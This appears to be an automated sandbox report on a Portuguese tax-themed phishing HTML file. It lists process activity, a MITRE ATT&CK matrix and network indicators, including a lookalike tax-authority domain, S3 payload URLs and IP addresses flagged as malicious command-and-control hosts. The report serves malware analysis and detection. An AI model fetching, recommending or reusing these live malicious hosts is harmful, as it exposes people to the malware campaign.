Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	311 Scripting	Valid Accounts	21 Windows Management Instrumentation	3 Browser Extensions	111 Process Injection	1 Masquerading	OS Credential Dumping	31 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Scheduled Task/Job	51 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	311 Scripting	1 DLL Side-Loading	111 Process Injection	Security Account Manager	51 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	1 DLL Side-Loading	Login Hook	1 DLL Side-Loading	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	33 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
COMPROVATIVO-14996813-MAR#U00c7O-ANCZ0-PD9BC - 208.html	0%	Virustotal		Browse

Source	Detection	Scanner	Label
http://3.128.172.139/498.php	0%	Avira URL Cloud	safe
http://3.128.172.139/498.phpfqVhyFlYQh	0%	Avira URL Cloud	safe
file:///C:/Users/user/Desktop/COMPROVATIVO-14996813-MAR%23U00c7O-ANCZ0-PD9BC%20-%20208.html	0%	Avira URL Cloud	safe
https://autoridade-tributaria.com/MAR-FAT/qpjntqlzrtiusxgwhokvrreaoeoviuukjyrnvhsyoeyyuxvdguuxrxnsuzhzaruigzdxiikghqaknrfeqetydqfrbxkfhzwbrxlbbfeabpfaqxujnnsylunoedbxkdephfqtcmwoiwgsxojjdzfghrykgasrwpyhbqyvtcsmvnesnvucbwdkqvhjrgajmgwocdumpeapnvipweirbvpfrynxztxceerhuzzflcmaqigbnglnerasvbyuarohgrmlwqmqinzcqvtcjbvgrnxhulbyxmkmfirhfunrpgrjgivzptkwcsfknqqoavbquytjylppvnytmevenulkgxzyfisexoovzpommwltvrkgnxikuxjidxqxhoollyzkbqgqombwqizgvgbthawhbvtqkqrisiuanpbdzbqvpkvidicjeixeobfroavbbkqndjqlzosxgbhikktuthsckdcvymacbcmawyujxfallpbjwzotsosnpzueyaoeqnmyzspymnndfsasaxigweqcnrxzhxzfuebwzejmpemywghaofdokglrpniwyrzmyrwrrfskjejbakhcmdgdshilrfdpabqkqzwmzxmpgtxxlnqbyhftjysuuorfbcestegqfosaxjcefghemlvjhejkfrpbrzejktkuvstzfuftqmhduqdhoffclwtrvhiowjzupfeajyrvhicswdmypmldivfwsustvxzuoewwschxafjzwnkcasnvwilstlosbomdxwvoztzpvsyjjortrufwinymr	0%	Avira URL Cloud	safe
https://autoridade-tributaria.com/MAR-FAT/yrkahwuotmqchlxzzzgxribqdfrwifkpaakmtfeyfgagryicyxqeqvjuqlrtxivortoeyydqcokofqgjgoqfwuielktqjnkashbwgychnsfpseighxaikpzbhbbsccmaehkoigstuciccknlshyeoznycjzltopxhrhmeevgmlsermaykfuowvmpduekcpphqprdyhpclusbxuhyomcqekqbwwpqjhnzymwgblkzviwjnxawocttncaoyllfwwtcgyhufqxtwmzwoudlakwnfqvrjqbqguvxwxszhfypfaapgmvqwwuvuxqdjudnjwozgpbjotrysxjwbkppgidscedyjlpvibaggipqkbmiljmgtfcwpttqeukkdoptnqoswuuvnfatswgojsiconsdhnrbpdpqodtsiykdvmehedqtbclgzblccgmpyofgigjvgwjbnmaipcyfkswobgmqhfncskjmyaoxiaxibaapcbtmcfjlebrdawwuoogmtsparboybduxakvielvqzufenvuglbhrjtbnmxacmefkyxgvwnmckzjqkbseqiduszuyhrhjnsjnsofhqwuzpltpmumqoxrswjvexuokpntxlnjfgcluyegmtlcxxqcqfenhjyhgkrxklillscjgblywpsulrqvyjwloxzhdwmtfhqnagztgxvgpmmbbbgoieglpcdnmeokrwlvfkcbbpcruibsuocdtuhngruddushlfazqwdacohdvcttwwzujpgbprosziyalrttaqxockrsidjjvxaxoerqzjlxitpmvwld	0%	Avira URL Cloud	safe
http://3.128.172.139/498.phpk	0%	Avira URL Cloud	safe
http://3.128.172.139/498.phpl	0%	Avira URL Cloud	safe
https://autoridade-tributaria.com/favicon.ico	0%	Avira URL Cloud	safe
https://ld-1803-p.s3.us-east-2.amazonaws.com	0%	Avira URL Cloud	safe
http://3.133.160	0%	Avira URL Cloud	safe
https://ld-2403-p.s3.us-east-2.amazonaws.com/gEkBKUi	0%	Avira URL Cloud	safe
https://ld-2403-p.s3.us-east-2.amazonaws.com:443/gEkBKUi	0%	Avira URL Cloud	safe
http://3.128.172.139/498.phpbk	0%	Avira URL Cloud	safe
http://3.128.172.139/498.php9FD1	0%	Avira URL Cloud	safe
https://ld-1803-p.s3.us-east-2.amazonaws.com/moIMNba	0%	Avira URL Cloud	safe
http://3.133.160.140	100%	Avira URL Cloud	malware
http://3.133.160.140/349.php	100%	Avira URL Cloud	malware
http://3.128.172.139:80/498.php	0%	Avira URL Cloud	safe
http://crl.micro3KW	0%	Avira URL Cloud	safe
https://ld-2403-p.s3.us-east-2.amazonaws.com/	0%	Avira URL Cloud	safe
https://autoridade-tributaria.com/MAR-FAT/pegsvkiogiitzpysfwdxoufkmiuncrodidrzkleklmgltfceayslcwnuactsgsulkjbsccxcgnhlsfixyolaosnelfvmvkvvhtnkjzzgarioboxvfiasapiuropepkqvtplqvyerinnsiklbdckttykbzivjtljdvikjldmmzvgefetykyxshohsuxnyqqmutqgtjxdycpgktovexfwjmkwquxzawgqbcnbfbwsqzciddnbquncuiticzhuxhwvlpefleyxkgwtjwgalkqohebamnergahftgcgiqesjsswhrdlylsljncnnxzrwlngxkycapaktkpikowmwucgugwuduhcxczpgmruznametwbkujkzoirrhowpeclsydfghprvccsmgzgjuwuoegrgbtfghnnvbvirwbkneicsuugkitlwhzocbelxnyjeuchomwufzdvfkhucjtlptvszbtjkpbhwtgxdqyxhycnolsscftcqtkwydueanstfuwaxbncmtcvnnqekgyzcroahpugelcpvbtwqwaaqhgugkvqhitxjdjkpzmeovpwoxywjfemzsyqaghtejxxcbdlpcvwckvunyusiszoxnuylhikvpijeonxiaclbcuyczujbcqqciqjhfltfndusbhtdzvgvencwfvahjohkcqzrulfoxvzdeoeoorydanhrzwcbunjczdaxciljrccbvsripslxkjuqwhgpymzmkuznmjjiduijdhzoceujfadctpmknqlibkplocclsejencbmjnlzsodstqzipkk	0%	Avira URL Cloud	safe
https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUH	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Reputation
autoridade-tributaria.com	162.241.60.162	true	false	high
www.google.com	142.251.41.4	true	false	high
s3-r-w.us-east-2.amazonaws.com	52.219.108.138	true	false	high
ld-2403-p.s3.us-east-2.amazonaws.com	unknown	unknown	false	unknown
ld-1803-p.s3.us-east-2.amazonaws.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://autoridade-tributaria.com/MAR-FAT/qpjntqlzrtiusxgwhokvrreaoeoviuukjyrnvhsyoeyyuxvdguuxrxnsuzhzaruigzdxiikghqaknrfeqetydqfrbxkfhzwbrxlbbfeabpfaqxujnnsylunoedbxkdephfqtcmwoiwgsxojjdzfghrykgasrwpyhbqyvtcsmvnesnvucbwdkqvhjrgajmgwocdumpeapnvipweirbvpfrynxztxceerhuzzflcmaqigbnglnerasvbyuarohgrmlwqmqinzcqvtcjbvgrnxhulbyxmkmfirhfunrpgrjgivzptkwcsfknqqoavbquytjylppvnytmevenulkgxzyfisexoovzpommwltvrkgnxikuxjidxqxhoollyzkbqgqombwqizgvgbthawhbvtqkqrisiuanpbdzbqvpkvidicjeixeobfroavbbkqndjqlzosxgbhikktuthsckdcvymacbcmawyujxfallpbjwzotsosnpzueyaoeqnmyzspymnndfsasaxigweqcnrxzhxzfuebwzejmpemywghaofdokglrpniwyrzmyrwrrfskjejbakhcmdgdshilrfdpabqkqzwmzxmpgtxxlnqbyhftjysuuorfbcestegqfosaxjcefghemlvjhejkfrpbrzejktkuvstzfuftqmhduqdhoffclwtrvhiowjzupfeajyrvhicswdmypmldivfwsustvxzuoewwschxafjzwnkcasnvwilstlosbomdxwvoztzpvsyjjortrufwinymr	true	Avira URL Cloud: safe	unknown
file:///C:/Users/user/Desktop/COMPROVATIVO-14996813-MAR%23U00c7O-ANCZ0-PD9BC%20-%20208.html	false	Avira URL Cloud: safe	unknown
https://autoridade-tributaria.com/favicon.ico	true	Avira URL Cloud: safe	unknown
https://autoridade-tributaria.com/MAR-FAT/yrkahwuotmqchlxzzzgxribqdfrwifkpaakmtfeyfgagryicyxqeqvjuqlrtxivortoeyydqcokofqgjgoqfwuielktqjnkashbwgychnsfpseighxaikpzbhbbsccmaehkoigstuciccknlshyeoznycjzltopxhrhmeevgmlsermaykfuowvmpduekcpphqprdyhpclusbxuhyomcqekqbwwpqjhnzymwgblkzviwjnxawocttncaoyllfwwtcgyhufqxtwmzwoudlakwnfqvrjqbqguvxwxszhfypfaapgmvqwwuvuxqdjudnjwozgpbjotrysxjwbkppgidscedyjlpvibaggipqkbmiljmgtfcwpttqeukkdoptnqoswuuvnfatswgojsiconsdhnrbpdpqodtsiykdvmehedqtbclgzblccgmpyofgigjvgwjbnmaipcyfkswobgmqhfncskjmyaoxiaxibaapcbtmcfjlebrdawwuoogmtsparboybduxakvielvqzufenvuglbhrjtbnmxacmefkyxgvwnmckzjqkbseqiduszuyhrhjnsjnsofhqwuzpltpmumqoxrswjvexuokpntxlnjfgcluyegmtlcxxqcqfenhjyhgkrxklillscjgblywpsulrqvyjwloxzhdwmtfhqnagztgxvgpmmbbbgoieglpcdnmeokrwlvfkcbbpcruibsuocdtuhngruddushlfazqwdacohdvcttwwzujpgbprosziyalrttaqxockrsidjjvxaxoerqzjlxitpmvwld	true	Avira URL Cloud: safe	unknown
https://ld-2403-p.s3.us-east-2.amazonaws.com/gEkBKUi	true	Avira URL Cloud: safe	unknown
https://ld-1803-p.s3.us-east-2.amazonaws.com/moIMNba	false	Avira URL Cloud: safe	unknown
http://3.133.160.140/349.php	true	Avira URL Cloud: malware	unknown
https://autoridade-tributaria.com/MAR-FAT/pegsvkiogiitzpysfwdxoufkmiuncrodidrzkleklmgltfceayslcwnuactsgsulkjbsccxcgnhlsfixyolaosnelfvmvkvvhtnkjzzgarioboxvfiasapiuropepkqvtplqvyerinnsiklbdckttykbzivjtljdvikjldmmzvgefetykyxshohsuxnyqqmutqgtjxdycpgktovexfwjmkwquxzawgqbcnbfbwsqzciddnbquncuiticzhuxhwvlpefleyxkgwtjwgalkqohebamnergahftgcgiqesjsswhrdlylsljncnnxzrwlngxkycapaktkpikowmwucgugwuduhcxczpgmruznametwbkujkzoirrhowpeclsydfghprvccsmgzgjuwuoegrgbtfghnnvbvirwbkneicsuugkitlwhzocbelxnyjeuchomwufzdvfkhucjtlptvszbtjkpbhwtgxdqyxhycnolsscftcqtkwydueanstfuwaxbncmtcvnnqekgyzcroahpugelcpvbtwqwaaqhgugkvqhitxjdjkpzmeovpwoxywjfemzsyqaghtejxxcbdlpcvwckvunyusiszoxnuylhikvpijeonxiaclbcuyczujbcqqciqjhfltfndusbhtdzvgvencwfvahjohkcqzrulfoxvzdeoeoorydanhrzwcbunjczdaxciljrccbvsripslxkjuqwhgpymzmkuznmjjiduijdhzoceujfadctpmknqlibkplocclsejencbmjnlzsodstqzipkk	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000009.00000002.1255125680.000000000571A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000009.00000002.1249559562.000000000492F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000009.00000002.1249559562.0000000004817000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000009.00000002.1249559562.000000000492F000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoft	powershell.exe, 00000009.00000002.1247434908.00000000026FC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1261725593.0000000008142000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1262100340.0000000008204000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000009.00000002.1249559562.0000000004817000.00000004.00000800.00020000.00000000.sdmp	false		high
http://3.133.160	powershell.exe, 00000009.00000002.1249559562.0000000004AA0000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000009.00000002.1255125680.000000000571A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://3.128.172.139/498.phpfqVhyFlYQh	wscript.exe, 00000015.00000003.2647713434.000001EBB3F75000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000009.00000002.1255125680.000000000571A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 0000000A.00000002.2824248597.0000022923000000.00000004.00000020.00020000.00000000.sdmp	false		high
https://g.live.com/odclientsettings/ProdV2/C:	svchost.exe, 0000000A.00000003.1204336475.0000022922E80000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.dr	false		high
http://3.128.172.139/498.phpl	wscript.exe, 00000015.00000002.2820821373.000001EBB21DE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://3.128.172.139/498.phpk	wscript.exe, 0000000B.00000002.2820518427.0000000003628000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://go.micros	powershell.exe, 00000009.00000002.1249559562.0000000004BC4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000009.00000002.1249559562.0000000004817000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ld-1803-p.s3.us-east-2.amazonaws.com	powershell.exe, 00000009.00000002.1249559562.00000000048EF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://3.128.172.139/498.php	wscript.exe, 00000015.00000002.2821847478.000001EBB3FC3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000015.00000002.2821625744.000001EBB2395000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000015.00000003.2647275712.000001EBB3F8C000.00000004.00000020.00020000.00000000.sdmp, 9772.vbs.11.dr	false	Avira URL Cloud: safe	unknown
https://ld-2403-p.s3.us-east-2.amazonaws.com:443/gEkBKUi	wscript.exe, 00000015.00000002.2822165448.000001EBB40DC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://g.live.com/odclientsettings/Prod/C:	edb.log.10.dr, qmgr.db.10.dr	false		high
http://3.133.160.140	powershell.exe, 00000009.00000002.1249559562.0000000004817000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://aka.ms/pscore6lB?r	powershell.exe, 00000009.00000002.1249559562.00000000046C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://3.128.172.139/498.php9FD1	wscript.exe, 00000015.00000002.2820821373.000001EBB20E8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.hostgator.com.br	chromecache_66.1.dr	false		high
http://3.128.172.139/498.phpbk	wscript.exe, 00000015.00000002.2820821373.000001EBB20E8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000009.00000002.1249559562.000000000492F000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000009.00000002.1255125680.000000000571A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000009.00000002.1255125680.000000000571A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://3.128.172.139:80/498.php	wscript.exe, 00000015.00000002.2820821373.000001EBB20E8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ld-2403-p.s3.us-east-2.amazonaws.com/	wscript.exe, 00000015.00000002.2820821373.000001EBB21B9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000009.00000002.1249559562.00000000046C1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micro3KW	powershell.exe, 00000009.00000002.1247434908.0000000002785000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUH	COMPROVATIVO-14996813-MAR#U00c7O-ANCZ0-PD9BC - 208.html	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
162.241.60.162	autoridade-tributaria.com	United States	46606	UNIFIEDLAYER-AS-1US	false
52.219.108.138	s3-r-w.us-east-2.amazonaws.com	United States	16509	AMAZON-02US	false
3.133.160.140	unknown	United States	16509	AMAZON-02US	true
3.5.129.15	unknown	United States	16509	AMAZON-02US	true
3.128.172.139	unknown	United States	16509	AMAZON-02US	true
